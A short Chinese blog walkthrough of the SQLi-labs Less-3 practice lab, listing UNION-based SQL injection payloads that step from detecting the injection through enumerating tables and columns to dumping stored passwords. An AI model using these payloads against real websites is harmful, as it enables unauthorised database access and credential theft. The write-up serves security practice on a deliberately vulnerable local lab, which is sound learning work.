Sqli-labs 3

hacker_17Z2024-07-11 23:44

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
小猪咪piggy3 分钟前
【JavaEE】(23) 综合练习--博客系统
java·数据库·java-ee
bikong713 分钟前
一种高效绘制余晖波形的方法Qt/C++
数据库·c++·qt
一叶飘零_sweeeet15 分钟前
从 0 到 1 攻克订单表分表分库:亿级流量下的数据库架构实战指南
java·数据库·mysql·数据库架构·分库分表
xianyinsuifeng30 分钟前
Oracle 10g → Oracle 19c 升级后问题解决方案(Pro*C 项目)
c语言·数据库·oracle
TDengine (老段)36 分钟前
TDengine 选择函数 First 用户手册
大数据·数据库·物联网·时序数据库·iot·tdengine·涛思数据
dreams_dream1 小时前
企业级 Django 日志配置示例
数据库·django·sqlite
心 一2 小时前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全
络72 小时前
Redis 非缓存核心场景及实例说明
数据库·redis·缓存
计算机学长felix2 小时前
基于Django的“酒店推荐系统”设计与开发(源码+数据库+文档+PPT)
数据库·python·mysql·django·vue
GBASE3 小时前
ITPUB专访南大通用——GBase 8s数据库以内核铸根基,以生态赢未来
数据库
热门推荐
012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!02UV安装并设置国内源032025年数学建模国赛C题超详细解题思路04A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程05不再让Windows更新!&Edge游戏助手卸载及关闭自动更新06UV 工具安装与国内镜像源配置指南07KGG转MP3工具|非KGM文件|解密音频082025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定09教你如何认证 Gemini 教育优惠的二次验证,薅个 1年的 Gemini Pro 会员10解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题